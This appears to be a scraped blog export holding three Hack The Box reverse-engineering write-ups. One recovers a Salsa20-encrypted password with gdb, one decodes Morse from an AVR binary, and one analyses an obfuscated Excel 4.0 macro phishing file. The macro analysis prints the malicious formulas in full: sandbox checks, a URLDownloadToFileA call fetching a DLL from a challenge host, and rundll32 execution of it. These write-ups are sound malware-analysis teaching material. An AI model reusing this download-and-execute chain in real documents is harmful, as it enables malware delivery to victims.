2026","externalUrl":null,"permalink":"/tags/packer/","section":"Tags","summary":"","title":"Packer","type":"tags"},{"content":"","date":"January 26, 2026","externalUrl":null,"permalink":"/tags/x64dbg/","section":"Tags","summary":"","title":"X64dbg","type":"tags"},{"content":" Difficulty: Easy OS: Linux Date: 2026-01-22 Description:\nMy implementation of authentication mechanisms in C turned out to be failures. But my implementation in Rust is unbreakable. Can you retrieve my password?\nInitial Analysis # rauth is an x86-64 ELF binary, dynamically linked and not stripped, so the Rust symbol names are available to us:\n$ file rauth\nrauth: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=fc374b8206147fac9067599050989191b39eefcf, with debug_info, not stripped\nWhen run, it asks for a password:\n$ ./rauth\nWelcome to secure login portal!\nEnter the password to access the system:\naaaaaaaaaaa\nYou entered a wrong password!\nA wrong password prints \u0026ldquo;You entered a wrong password!\u0026rdquo;, so my first idea was to open the file in IDA and find the check that leads to that branch.\nDisassembling # These lines make the branching decision.\nbl is tested against 0; if it is zero, execution jumps to loc_6992 and prints \u0026quot;You entered a wrong password!\u0026quot;. Debugging # I decided to flip the outcome by changing the value of rbx in the debugger at that comparison:\n(gdb) b *0x55555540683e\nBreakpoint 2 at 0x55555540683e\n(gdb) c\nContinuing.\nWelcome to secure login portal!\n
6Breakpoint 2, 0x000055555540683e in rauth::main () 7(gdb) set $rbx = 1 8(gdb) c 9Continuing. 10Successfully Authenticated 11(gdb) \u0026#34;HTB{F4k3_f74g_4_t3s7ing}\u0026#34; 12[Inferior 1 (process 24204) exited normally] Бачимо що ми отримали fake flag.\nsalsa20 # Я помітив використання криптографічного алгоритму Salsa20.\n1(gdb) info func salsa 2All functions matching regular expression \u0026#34;salsa\u0026#34;: 3 4Non-debugging symbols: 50x00005555554056b0 salsa20::core::Core\u0026lt;R\u0026gt;::apply_keystream 60x0000555555405900 salsa20::core::Core\u0026lt;R\u0026gt;::new 70x00005555554059a0 salsa20::core::Core\u0026lt;R\u0026gt;::rounds 80x0000555555405d10 \u0026lt;salsa20::salsa::Salsa\u0026lt;R\u0026gt; as cipher::stream::StreamCipher\u0026gt;::try_apply_keystream salsa20::core::Core\u0026lt;R\u0026gt;::new - constructor that typically takes a 256-bit (32-byte) key and a 64-bit (8-byte) nonce (IV)\nsalsa20::core::Core\u0026lt;R\u0026gt;::apply_keystream -\nВирішви подивитися які аргументи передаються в Salsa20::new\n1(gdb) b salsa20::core::Core\u0026lt;R\u0026gt;::new 2Breakpoint 2 at 0x555555405900 3(gdb) b salsa20::core::Core\u0026lt;R\u0026gt;::apply_keystream 4Breakpoint 3 at 0x5555554056b0 5(gdb) start 6The program being debugged has been started already. 7Start it from the beginning? (y or n) y 8Temporary breakpoint 4 at 0x555555406bd0 9Starting program: /home/kali/Desktop/challanges/RAuth/rauth 10[Thread debugging using libthread_db enabled] 11Using host libthread_db library \u0026#34;/usr/lib/x86_64-linux-gnu/libthread_db.so.1\u0026#34;. 12 13Temporary breakpoint 4, 0x0000555555406bd0 in main () 14(gdb) c 15Continuing. 16Welcome to secure login portal! 
17Enter the password to access the system: 18aaaaa 19 20Breakpoint 2, 0x0000555555405900 in salsa20::core::Core\u0026lt;R\u0026gt;::new () 21(gdb) i r 22rax 0x55555564fe20 93824993263136 23rbx 0x555555408530 93824990872880 24rcx 0x55555564fe20 93824993263136 25rdx 0x7fffffffdaa0 140737488345760 26rsi 0x7fffffffda70 140737488345712 27rdi 0x7fffffffd9e0 140737488345568 28rbp 0x1 0x1 29rsp 0x7fffffffd9d8 0x7fffffffd9d8 30r8 0x7ffff7e15ac0 140737352129216 31r9 0x30 48 32r10 0x1 1 33r11 0x0 0 34r12 0x0 0 35r13 0x555555439e28 93824991075880 36r14 0x555555649090 93824993235088 37r15 0x55555564fe20 93824993263136 38rip 0x555555405900 0x555555405900 \u0026lt;salsa20::core::Core\u0026lt;R\u0026gt;::new\u0026gt; 39eflags 0x202 [ IF ] 40cs 0x33 51 41ss 0x2b 43 42ds 0x0 0 43es 0x0 0 44fs 0x0 0 45gs 0x0 0 46fs_base 0x7ffff7f5d800 140737353472000 47gs_base 0x0 0 48(gdb) x/s $rdi 490x7fffffffd9e0: \u0026#34; \u0026#34; 50(gdb) x/s $rsi 510x7fffffffda70: \u0026#34;ef39f4f20e76e33bd25f4db338e81b10\\001\u0026#34; 52(gdb) x/s $rdx 530x7fffffffdaa0: \u0026#34;d4c270a3\u0026#34; The value in rsi is the 32-byte key and the value in rdx is the nonce:\n- key: ef39f4f20e76e33bd25f4db338e81b10\n- nonce: d4c270a3\nNext I needed to find where the encrypted data is stored. Before the call to salsa20::core::Core\u0026lt;R\u0026gt;::new I noticed a 32-byte value from xmmword_39CC0 and xmmword_39CD0 being placed on the stack.\n1.rodata:0000000000039CC0 xmmword_39CC0 xmmword 0F331CBA656F5D958D5A829A3B15F0505h 2.rodata:0000000000039CD0 xmmword_39CD0 xmmword 0F91BAD626FB63EE372EC9DC9312A4324h Decryption attempt\n1$ python3 2Python 3.13.11 (main, Dec 8 2025, 11:43:54) [GCC 15.2.0] on linux 3Type \u0026#34;help\u0026#34;, \u0026#34;copyright\u0026#34;, \u0026#34;credits\u0026#34; or \u0026#34;license\u0026#34; for more information.
4\u0026gt;\u0026gt;\u0026gt; from Crypto.Cipher import Salsa20 5\u0026gt;\u0026gt;\u0026gt; c = \u0026#34;0505 5fb1 a329 a8d5 58d9 f556 a6cb 31f3 2443 2a31 c99d ec72 e33e b66f 62ad 1bf9\u0026#34; 6\u0026gt;\u0026gt;\u0026gt; Salsa20.new(key=b\u0026#34;ef39f4f20e76e33bd25f4db338e81b10\u0026#34;, nonce=b\u0026#34;d4c270a3\u0026#34;).decrypt(bytes.fromhex(c)) 7b\u0026#39;TheCrucialRustEngineering@2021;)\u0026#39; And when we try to authenticate on the host with this password, we get the flag.\n1$ nc 94.237.63.176 32734 2Welcome to secure login portal! 3Enter the password to access the system: 4TheCrucialRustEngineering@2021;) 5Successfully Authenticated 6Flag: \u0026#34;HTB{I_Kn0w_h0w_t0_5al54}\u0026#34; ","date":"January 22, 2026","externalUrl":null,"permalink":"/investigations/htb-rauth/","section":"","summary":"","title":"HTB-RAuth","type":"investigations"},{"content":"","date":"January 22, 2026","externalUrl":null,"permalink":"/tags/rust/","section":"Tags","summary":"","title":"Rust","type":"tags"},{"content":"","date":"January 22, 2026","externalUrl":null,"permalink":"/tags/rust-gdb/","section":"Tags","summary":"","title":"Rust-Gdb","type":"tags"},{"content":"","date":"January 22, 2026","externalUrl":null,"permalink":"/tags/salsa20/","section":"Tags","summary":"","title":"Salsa20","type":"tags"},{"content":"","date":"January 21, 2026","externalUrl":null,"permalink":"/tags/avr/","section":"Tags","summary":"","title":"Avr","type":"tags"},{"content":"","date":"January 21, 2026","externalUrl":null,"permalink":"/tags/ghidra/","section":"Tags","summary":"","title":"Ghidra","type":"tags"},{"content":"Description\nIn the cacophony of noise lies the potential for a clear message. (The flag format is HTB{SOME TEXT HERE}.)
Difficulty: Easy OS: Linux Date: 2026-01-21 Initial Analysis # I identified the binary type to understand what I was dealing with\n1$ file Hubbub 2Hubbub: ELF 32-bit LSB executable, Atmel AVR 8-bit, version 1 (SYSV), statically linked, with debug_info, not stripped It\u0026rsquo;s an Atmel AVR 8-bit executable, commonly used in Arduino microcontrollers.\nRunning strings on the binary revealed references to Arduino library functions like tone() and delay(). This immediately suggested the program generates audio output, possibly encoding a hidden message.\nReverse # I opened it in Ghidra and found the main logic in function FUN_code_0002f4. I understood that \u0026hellip; and then \u0026hellip; Inside main, I observed a repetitive pattern of function calls. By correlating the assembly instructions with the strings found earlier, I identified two key functions:\nThe Pattern Emerges # tone (FUN_code_0001b5): generates sound at specific frequencies\ndelay (FUN_code_000098): creates pauses in execution\nLooking closely at the arguments passed to delay(), I noticed two distinct constants being loaded into registers:\n- 0x012c (300 ms)\n- 0x0158 (600 ms)\nGiven the audio context, I hypothesized this was Morse Code.\n- The shorter duration 0x2c represents a Dot (.)\n- The longer duration 0x58 (exactly double the short duration) represents a Dash (-)\nDecoding # I extracted the decompiled C code from Ghidra into a text file named dec.txt and wrote a Python script to parse it.\n1with open(\u0026#34;dec.txt\u0026#34;, \u0026#39;r\u0026#39;, encoding=\u0026#39;utf-8\u0026#39;) as f: 2 lines = f.readlines() 3 4morse_code = \u0026#34;\u0026#34; 5 6for l in lines: 7 if \u0026#34;0x2c\u0026#34; in l: 8 morse_code += \u0026#34;.\u0026#34; 9 elif \u0026#34;0x58\u0026#34; in l: 10 morse_code += \u0026#34;-\u0026#34; 11 12 if \u0026#34;0xe8\u0026#34; in l: 13 morse_code += \u0026#34; \u0026#34; 14 elif \u0026#34;0xd0\u0026#34; in l: 15 morse_code += \u0026#34; / \u0026#34; 16
17print(morse_code) 18 19MORSE_dict = { 20 \u0026#39;..-.\u0026#39;: \u0026#39;F\u0026#39;, \u0026#39;-..-\u0026#39;: \u0026#39;X\u0026#39;, \u0026#39;.--.\u0026#39;: \u0026#39;P\u0026#39;, \u0026#39;-\u0026#39;: \u0026#39;T\u0026#39;, \u0026#39;..---\u0026#39;: \u0026#39;2\u0026#39;, 21 \u0026#39;....-\u0026#39;: \u0026#39;4\u0026#39;, \u0026#39;-----\u0026#39;: \u0026#39;0\u0026#39;, \u0026#39;--...\u0026#39;: \u0026#39;7\u0026#39;, \u0026#39;...-\u0026#39;: \u0026#39;V\u0026#39;, \u0026#39;-.-.\u0026#39;: \u0026#39;C\u0026#39;, 22 \u0026#39;.\u0026#39;: \u0026#39;E\u0026#39;, \u0026#39;.---\u0026#39;: \u0026#39;J\u0026#39;, \u0026#39;---\u0026#39;: \u0026#39;O\u0026#39;, \u0026#39;-.-\u0026#39;: \u0026#39;K\u0026#39;, \u0026#39;----.\u0026#39;: \u0026#39;9\u0026#39;, 23 \u0026#39;..\u0026#39;: \u0026#39;I\u0026#39;, \u0026#39;.-..\u0026#39;: \u0026#39;L\u0026#39;, \u0026#39;.....\u0026#39;: \u0026#39;5\u0026#39;, \u0026#39;...--\u0026#39;: \u0026#39;3\u0026#39;, \u0026#39;-.--\u0026#39;: \u0026#39;Y\u0026#39;, 24 \u0026#39;-....\u0026#39;: \u0026#39;6\u0026#39;, \u0026#39;.--\u0026#39;: \u0026#39;W\u0026#39;, \u0026#39;....\u0026#39;: \u0026#39;H\u0026#39;, \u0026#39;-.\u0026#39;: \u0026#39;N\u0026#39;, \u0026#39;.-.\u0026#39;: \u0026#39;R\u0026#39;, 25 \u0026#39;-...\u0026#39;: \u0026#39;B\u0026#39;, \u0026#39;---..\u0026#39;: \u0026#39;8\u0026#39;, \u0026#39;--..\u0026#39;: \u0026#39;Z\u0026#39;, \u0026#39;-..\u0026#39;: \u0026#39;D\u0026#39;, \u0026#39;--.-\u0026#39;: \u0026#39;Q\u0026#39;, 26 \u0026#39;--.\u0026#39;: \u0026#39;G\u0026#39;, \u0026#39;--\u0026#39;: \u0026#39;M\u0026#39;, \u0026#39;..-\u0026#39;: \u0026#39;U\u0026#39;, \u0026#39;.-\u0026#39;: \u0026#39;A\u0026#39;, \u0026#39;...\u0026#39;: \u0026#39;S\u0026#39;, \u0026#39;.----\u0026#39;: \u0026#39;1\u0026#39; 27} 28 29def morse_to_text(stri): 30 res = \u0026#34;\u0026#34; 31 stri = stri.split(\u0026#34; \u0026#34;) 32 33 for s in stri: 34 if s == \u0026#34;/\u0026#34;: 35 res += \u0026#34; 
\u0026#34; 36 else: 37 res += MORSE_dict[s] 38 return res 39 40print(morse_to_text(morse_code)) Running the script:\n1$ python3 dec.py 2.... - -... / .- / -. --- .. ... -.-- / -... ..- --.. --.. . .-. / -.-. --- -- -- .- -. -.. ... / .- - - . -. - .. --- -. 3HTB A NOISY BUZZER COMMANDS ATTENTION The flag:\n1HTB{A NOISY BUZZER COMMANDS ATTENTION} ","date":"January 21, 2026","externalUrl":null,"permalink":"/investigations/htb-hubbub/","section":"","summary":"","title":"HTB-Hubbub","type":"investigations"},{"content":"","date":"January 20, 2026","externalUrl":null,"permalink":"/tags/excel/","section":"Tags","summary":"","title":"Excel","type":"tags"},{"content":" Difficulty: Hard OS: Linux Date: 2026-01-20 Description: Another Phishing document. Dig in and see if you can find what it executes.\nTL;DR # Malicious Excel 97-2003 document containing obfuscated XLM (Excel 4.0) macros. Analysis involves identifying the file format, extracting embedded macros using oletools, deobfuscating concatenated formula chains, and reconstructing the complete malicious payload to extract the flag.\nInitial Analysis # I identified the file type to understand its structure. The provided file is an Excel 97-2003 document.\n1$ file oBfsC4t10n2.xls 2oBfsC4t10n2.xls: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: 0xdf, Last Saved By: 0xdf, Name of Creating Application: Microsoft Excel, Create Time/Date: Mon Mar 23 15:19:10 2020, Last Saved Time/Date: Sat Apr 25 19:43:56 2020, Security: 0 oleid shows no VBA macros but confirms the presence of Excel 4.0 (XLM) macros.\n1$ oleid oBfsC4t10n2.xls 2...[snip]... 3--------------------+--------------------+----------+-------------------------- 4VBA Macros |No |none |This file does not contain 5 | | |VBA macros. 6--------------------+--------------------+----------+-------------------------- 7XLM Macros |Yes |Medium |This file contains XLM 8 | | |macros. Use olevba to 9 | | |analyse them.
10--------------------+--------------------+----------+-------------------------- 11...[snip]... Analysis # Using olevba to extract and analyze the XLM macros:\n1\u0026#39; Sheet,Reference,Formula,Value 2\u0026#39; c1zB0vasN,D8,\u0026#34;IF(GET.WORKSPACE(42),CONCATENATE(E394,F1194,F549,E635,O697,U208,T458,M868,Z4,U777),CONCATENATE(F394,F1194,E549,O635,U697,D777))\u0026#34;,\u0026#34;\u0026#34; 3\u0026#39; c1zB0vasN,D9,GET.WORKSPACE(13),\u0026#34;\u0026#34; 4\u0026#39; c1zB0vasN,D10,GOTO(C1300),\u0026#34;\u0026#34; 5\u0026#39; c1zB0vasN,H60,\u0026#34;CONCATENATE(D187,P602,Y1087,L575)\u0026#34;,\u0026#34;\u0026#34; 6\u0026#39; c1zB0vasN,I180,\u0026#34;CONCATENATE(E615,W1026)\u0026#34;,\u0026#34;\u0026#34; 7\u0026#39; c1zB0vasN,D187,\u0026#34;CONCATENATE(K1036,D1095,Q603,B482)\u0026#34;,\u0026#34;\u0026#34; 8\u0026#39; c1zB0vasN,Q222,\u0026#34;IF(GET.WORKSPACE(19),ON.TIME(NOW()+\u0026#34;00:00:02\u0026#34;,\u0026#34;rstegerg3\u0026#34;),CLOSE(TRUE))\u0026#34;,\u0026#34;\u0026#34; 9\u0026#39; c1zB0vasN,O347,\u0026#34;CONCATENATE(I1324,M11,L54,F80,Y144,X179,P383)\u0026#34;,\u0026#34;\u0026#34; 10\u0026#39; c1zB0vasN,K390,\u0026#34;CONCATENATE(R890,G625,D1023,O870)\u0026#34;,\u0026#34;\u0026#34; 11\u0026#39; c1zB0vasN,U410,\u0026#34;CONCATENATE(B781,I781)\u0026#34;,\u0026#34;\u0026#34; 12\u0026#39; c1zB0vasN,Y420,\u0026#34;CONCATENATE(B1193,F1204,W1216)\u0026#34;,\u0026#34;\u0026#34; 13\u0026#39; c1zB0vasN,D450,\u0026#34;CONCATENATE(T7,V202)\u0026#34;,\u0026#34;\u0026#34; 14\u0026#39; c1zB0vasN,D513,\u0026#34;CONCATENATE(Y841,L955,A1038,R1149,G1239)\u0026#34;,\u0026#34;\u0026#34; 15\u0026#39; c1zB0vasN,N545,\u0026#34;document.HIDE(\u0026#34;c1zB0vasNO\u0026#34;,TRUE)\u0026#34;,\u0026#34;\u0026#34; 16\u0026#39; c1zB0vasN,N546,GET.WORKSPACE(1),\u0026#34;\u0026#34; 17\u0026#39; c1zB0vasN,N547,\u0026#34;IF(ISNUMBER(SEARCH(\u0026#34;Windows\u0026#34;,N546)),ON.TIME(NOW()+\u0026#34;00:00:02\u0026#34;,\u0026#34;agawf23f\u0026#34;),CLOSE(FALSE))\u0026#34;,\u0026#34;\u0026#34; 
18\u0026#39; c1zB0vasN,L554,\u0026#34;CONCATENATE(D999,K1225)\u0026#34;,\u0026#34;\u0026#34; 19\u0026#39; c1zB0vasN,L575,\u0026#34;CONCATENATE(F1242,W428,R608)\u0026#34;,\u0026#34;\u0026#34; 20\u0026#39; c1zB0vasN,Q603,\u0026#34;CONCATENATE(Q1159,P1236,D1332,R27,W353,D434)\u0026#34;,\u0026#34;\u0026#34; 21\u0026#39; c1zB0vasN,E615,\u0026#34;CONCATENATE(D999,L1217,M1256,U1315)\u0026#34;,\u0026#34;\u0026#34; 22\u0026#39; c1zB0vasN,T698,\u0026#34;IF(OR(D9\u0026lt;700),ON.TIME(NOW()+\u0026#34;00:00:02\u0026#34;,A1),ON.TIME(NOW()+\u0026#34;00:00:02\u0026#34;,\u0026#34;Lsl23Us7a\u0026#34;))\u0026#34;,\u0026#34;\u0026#34; 23\u0026#39; c1zB0vasN,O752,\u0026#34;CONCATENATE(D8,D513)\u0026#34;,\u0026#34;\u0026#34; 24\u0026#39; c1zB0vasN,B781,\u0026#34;CONCATENATE(E1006,T1063,D874,P180)\u0026#34;,\u0026#34;\u0026#34; 25\u0026#39; c1zB0vasN,I781,\u0026#34;CONCATENATE(Y222,K1085,P765,I809,C877)\u0026#34;,\u0026#34;\u0026#34; 26\u0026#39; c1zB0vasN,D874,\u0026#34;CONCATENATE(E1164,U1191,V1285,N11,E94)\u0026#34;,\u0026#34;\u0026#34; 27\u0026#39; c1zB0vasN,R890,\u0026#34;CONCATENATE(J1273,U385,T673,R75,H865)\u0026#34;,\u0026#34;\u0026#34; 28\u0026#39; c1zB0vasN,C953,\u0026#34;CONCATENATE(B358,Q771,K834,K924,D1020,M1175,F94)\u0026#34;,\u0026#34;\u0026#34; 29\u0026#39; c1zB0vasN,D999,\u0026#34;CONCATENATE(X1224,P1281,U1293,G11,Q801)\u0026#34;,\u0026#34;\u0026#34; 30\u0026#39; c1zB0vasN,R999,\u0026#34;\u0026#34;,4.00000000000000000000 31\u0026#39; c1zB0vasN,Q1000,CONCATENATE(U410),\u0026#34;\u0026#34; 32\u0026#39; c1zB0vasN,D1023,\u0026#34;IF(ISNUMBER(SEARCH(\u0026#34;6.1\u0026#34;,N546)),CONCATENATE(Z699,L932,J1190,C574,J644,A718,E813),CONCATENATE(A699,E932,K1190,J574,A644,Z718,W813))\u0026#34;,\u0026#34;\u0026#34; 33\u0026#39; c1zB0vasN,D1024,GOTO(R1186),\u0026#34;\u0026#34; 34\u0026#39; c1zB0vasN,W1026,\u0026#34;CONCATENATE(B1334,B36,H461,G1019,U1036)\u0026#34;,\u0026#34;\u0026#34; 35\u0026#39; 
c1zB0vasN,S1032,\u0026#34;CONCATENATE(M15,T86,S187,V106,R58,P1318,C194,M440)\u0026#34;,\u0026#34;\u0026#34; 36\u0026#39; c1zB0vasN,S1035,\u0026#34;\u0026#34;,4.00000000000000000000 37\u0026#39; c1zB0vasN,C1040,\u0026#34;CONCATENATE(F1213,I1285,O347,X742)\u0026#34;,\u0026#34;\u0026#34; 38\u0026#39; c1zB0vasN,P1047,\u0026#34;CONCATENATE(H730,C801,K802,S1032,C297,B358)\u0026#34;,\u0026#34;\u0026#34; 39\u0026#39; c1zB0vasN,K1085,\u0026#34;CONCATENATE(G335,Q471,W570,F615,O686,V719)\u0026#34;,\u0026#34;\u0026#34; 40\u0026#39; c1zB0vasN,Y1087,\u0026#34;CONCATENATE(T645,M750,N1097,V551,Z960,B994)\u0026#34;,\u0026#34;\u0026#34; 41\u0026#39; c1zB0vasN,R1186,GET.WORKSPACE(1),\u0026#34;\u0026#34; 42\u0026#39; c1zB0vasN,R1187,\u0026#34;IF(NOT(ISNUMBER(SEARCH(\u0026#34;7.0\u0026#34;,R1186))),CLOSE(FALSE))\u0026#34;,\u0026#34;\u0026#34; 43\u0026#39; c1zB0vasN,R1188,\u0026#34;CALL(\u0026#34;Kernel32\u0026#34;,\u0026#34;CreateDirectoryA\u0026#34;,\u0026#34;JCJ\u0026#34;,\u0026#34;C:\\rncwner\u0026#34;,0)\u0026#34;,\u0026#34;\u0026#34; 44\u0026#39; c1zB0vasN,R1189,\u0026#34;CALL(\u0026#34;Kernel32\u0026#34;,\u0026#34;CreateDirectoryA\u0026#34;,\u0026#34;JCJ\u0026#34;,\u0026#34;C:\\rncwner\\CkkYKlI\u0026#34;,0)\u0026#34;,\u0026#34;\u0026#34; 45\u0026#39; c1zB0vasN,J1190,\u0026#34;CONCATENATE(T1000,W1063,O1107,K1131,D517)\u0026#34;,\u0026#34;\u0026#34; 46\u0026#39; c1zB0vasN,R1190,\u0026#34;CALL(F1220,Q1000,\u0026#34;JJCCJJ\u0026#34;,0,H60,G1332,0,0)\u0026#34;,\u0026#34;\u0026#34; 47\u0026#39; c1zB0vasN,R1191,\u0026#34;CALL(L554,I180,\u0026#34;JJCCCCJ\u0026#34;,0,\u0026#34;Open\u0026#34;,\u0026#34;rundll32.exe\u0026#34;,CONCATENATE(G1332,D8,D513,K390),0,0)\u0026#34;,\u0026#34;\u0026#34; 48\u0026#39; c1zB0vasN,R1192,GOTO(A1338),\u0026#34;\u0026#34; 49\u0026#39; c1zB0vasN,F1220,\u0026#34;CONCATENATE(K1184,Y420,D450)\u0026#34;,\u0026#34;\u0026#34; 50\u0026#39; c1zB0vasN,K1225,\u0026#34;CONCATENATE(Q880,V1048)\u0026#34;,\u0026#34;\u0026#34; 51\u0026#39; 
c1zB0vasN,C1300,GOTO(Q222),\u0026#34;\u0026#34; 52\u0026#39; c1zB0vasN,G1332,\u0026#34;CONCATENATE(P1047,C593,C1040)\u0026#34;,\u0026#34;\u0026#34; 53\u0026#39; c1zB0vasN,D1337,\u0026#34;IF(F100\u0026lt;300,ON.TIME(NOW()+\u0026#34;00:00:02\u0026#34;,A1),ON.TIME(NOW()+\u0026#34;00:00:02\u0026#34;,\u0026#34;KsshpqC4Mo\u0026#34;))\u0026#34;,\u0026#34;\u0026#34; 54\u0026#39; c1zB0vasN,A1338,\u0026#34;FORMULA.FILL(\u0026#34;a\u0026#34;,R~0C~0)\u0026#34;,\u0026#34;\u0026#34; 55\u0026#39; c1zB0vasN,A1339,HALT(),\u0026#34;\u0026#34; I see:\nCALL() to Windows APIs\nCONCATENATE() functions (likely obfuscating strings)\nGET.WORKSPACE() environment checks\nrundll32.exe execution\nFile download functionality\nKey suspicious indicators:\nURLDownloadToFileA\nShellExecuteA\nrundll32.exe\nConditional OS/version checks\nDeobfuscation # To evaluate macro behavior, I used xlmdeobfuscator emulation.\n1$ xlmdeobfuscator --file oBfsC4t10n2.xls 2...[snip]... 3 4$ olevba oBfsC4t10n2.xls 5...[snip]... 6\u0026#39; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 7\u0026#39; EMULATION - DEOBFUSCATED EXCEL4/XLM MACRO FORMULAS: 8\u0026#39; CELL:N545 , PartialEvaluation , =document.HIDE(\u0026#34;c1zB0vasNO\u0026#34;,TRUE) 9\u0026#39; CELL:N546 , FullEvaluation , GET.WORKSPACE(1) 10\u0026#39; CELL:N547 , Branching , IF(ISNUMBER(SEARCH(\u0026#34;Windows\u0026#34;,N546)),ON.TIME(NOW()+\u0026#34;00:00:02\u0026#34;,\u0026#34;agawf23f\u0026#34;),CLOSE(FALSE)) 11\u0026#39; CELL:N547 , FullEvaluation , [TRUE] ON.TIME(NOW()+\u0026#34;00:00:02\u0026#34;,\u0026#34;agawf23f\u0026#34;) 12\u0026#39; CELL:D8 , Branching , IF(GET.WORKSPACE(42.0),CONCATENATE(E394,F1194,F549,E635,O697,U208,T458,M868,Z4,U777),CONCATENATE(F394,F1194,E549,O635,U697,D777)) 13\u0026#39; CELL:D8 , FullEvaluation , [TRUE] \u0026#34; HTB{n0w_e\u0026#34; 14\u0026#39; CELL:D9 , FullEvaluation , GET.WORKSPACE(13) 15\u0026#39; CELL:D10 , FullEvaluation , GOTO(C1300) 16\u0026#39; CELL:C1300 , FullEvaluation , GOTO(Q222)
17\u0026#39; CELL:Q222 , Branching , IF(GET.WORKSPACE(19.0),ON.TIME(NOW()+\u0026#34;00:00:02\u0026#34;,\u0026#34;rstegerg3\u0026#34;),CLOSE(TRUE)) 18\u0026#39; CELL:Q222 , FullEvaluation , [TRUE] ON.TIME(NOW()+\u0026#34;00:00:02\u0026#34;,\u0026#34;rstegerg3\u0026#34;) 19\u0026#39; CELL:T698 , Branching , IF(OR(D9\u0026lt;700.0),ON.TIME(NOW()+\u0026#34;00:00:02\u0026#34;,A1),ON.TIME(NOW()+\u0026#34;00:00:02\u0026#34;,\u0026#34;Lsl23Us7a\u0026#34;)) 20\u0026#39; CELL:T698 , FullEvaluation , [FALSE] ON.TIME(NOW()+\u0026#34;00:00:02\u0026#34;,\u0026#34;Lsl23Us7a\u0026#34;) 21\u0026#39; CELL:D1337 , Branching , IF(F100\u0026lt;300.0,ON.TIME(NOW()+\u0026#34;00:00:02\u0026#34;,A1),ON.TIME(NOW()+\u0026#34;00:00:02\u0026#34;,\u0026#34;KsshpqC4Mo\u0026#34;)) 22\u0026#39; CELL:D1337 , FullEvaluation , [FALSE] ON.TIME(NOW()+\u0026#34;00:00:02\u0026#34;,\u0026#34;KsshpqC4Mo\u0026#34;) 23\u0026#39; CELL:D1023 , Branching , IF(ISNUMBER(SEARCH(\u0026#34;6.1\u0026#34;,N546)),CONCATENATE(Z699,L932,J1190,C574,J644,A718,E813),CONCATENATE(A699,E932,K1190,J574,A644,Z718,W813)) 24\u0026#39; CELL:D1023 , FullEvaluation , [FALSE] \u0026#34;A$0!(rR\u0026#34; 25\u0026#39; CELL:D1024 , FullEvaluation , GOTO(R1186) 26\u0026#39; CELL:R1186 , FullEvaluation , GET.WORKSPACE(1) 27\u0026#39; CELL:R1187 , FullEvaluation , IF(NOT(ISNUMBER(SEARCH(\u0026#34;7.0\u0026#34;,R1186))),CLOSE(FALSE)) 28\u0026#39; CELL:R1188 , FullEvaluation , CALL(\u0026#34;Kernel32\u0026#34;,\u0026#34;CreateDirectoryA\u0026#34;,\u0026#34;JCJ\u0026#34;,\u0026#34;C:\\rncwner\u0026#34;,0) 29\u0026#39; CELL:R1189 , FullEvaluation , CALL(\u0026#34;Kernel32\u0026#34;,\u0026#34;CreateDirectoryA\u0026#34;,\u0026#34;JCJ\u0026#34;,\u0026#34;C:\\rncwner\\CkkYKlI\u0026#34;,0) 30\u0026#39; CELL:R1190 , FullEvaluation , CALL(\u0026#34;URLMON\u0026#34;,\u0026#34;URLDownloadToFileA\u0026#34;,\u0026#34;JJCCJJ\u0026#34;,0,\u0026#34;http://0b.htb/s.dll\u0026#34;,\u0026#34;C:\\rncwner\\CkuiQhTXx.dll\u0026#34;,0,0) 31\u0026#39; CELL:R1191 , 
FullEvaluation , CALL(\u0026#34;Shell32\u0026#34;,\u0026#34;ShellExecuteA\u0026#34;,\u0026#34;JJCCCCJ\u0026#34;,0,\u0026#34;Open\u0026#34;,\u0026#34;rundll32.exe\u0026#34;,\u0026#34;C:\\rncwner\\CkuiQhTXx.dllIF(GET.WORKSPACE(42.0),CONCATENATE(E394,F1194,F549,E635,O697,U208,T458,M868,Z4,U777),CONCATENATE(F394,F1194,E549,O635,U697,D777))Xc3l_4.0_M4IF(ISNUMBER(SEARCH(\u0026#34;\u0026#34;6.1\u0026#34;\u0026#34;,N546)),CONCATENATE(Z699,L932,J1190,C574,J644,A718,E813),CONCATENATE(A699,E932,K1190,J574,A644,Z718,W813))}\u0026#34;,0,0) 32\u0026#39; CELL:R1192 , FullEvaluation , GOTO(A1338) 33\u0026#39; CELL:A1338 , FullEvaluation , FORMULA.FILL(\u0026#34;a\u0026#34;,A1:Z1337) 34\u0026#39; CELL:A1339 , End , HALT() 35\u0026#39; CELL:D1023 , FullEvaluation , [FALSE] \u0026#34;aaaaaaa\u0026#34; 36\u0026#39; CELL:D8 , FullEvaluation , [TRUE] \u0026#34;aaaaaaaaaa\u0026#34; The deobfuscated stream reveals the following behavior:\nHiding the document: document.HIDE(\u0026ldquo;c1zB0vasNO\u0026rdquo;,TRUE)\nAnti-Sandbox: The script checks for specific environment characteristics before proceeding.\nGET.WORKSPACE(1) checks the OS version\nGET.WORKSPACE(13) checks screen workspace size\nGET.WORKSPACE(19) checks if a mouse is present\nGET.WORKSPACE(42) checks if audio capabilities are present\nIt attempts to create a directory structure on the C: drive.\n1CALL(\u0026#34;Kernel32\u0026#34;,\u0026#34;CreateDirectoryA\u0026#34;,\u0026#34;JCJ\u0026#34;,\u0026#34;C:\\rncwner\u0026#34;,0) 2CALL(\u0026#34;Kernel32\u0026#34;,\u0026#34;CreateDirectoryA\u0026#34;,\u0026#34;JCJ\u0026#34;,\u0026#34;C:\\rncwner\\CkkYKlI\u0026#34;,0) It downloads a DLL from a remote host using URLDownloadToFileA.\n1CALL(\u0026#34;URLMON\u0026#34;,\u0026#34;URLDownloadToFileA\u0026#34;,\u0026#34;JJCCJJ\u0026#34;,0,\u0026#34;http://0b.htb/s.dll\u0026#34;,\u0026#34;C:\\rncwner\\CkuiQhTXx.dll\u0026#34;,0,0) It executes the downloaded DLL using rundll32.exe.\n
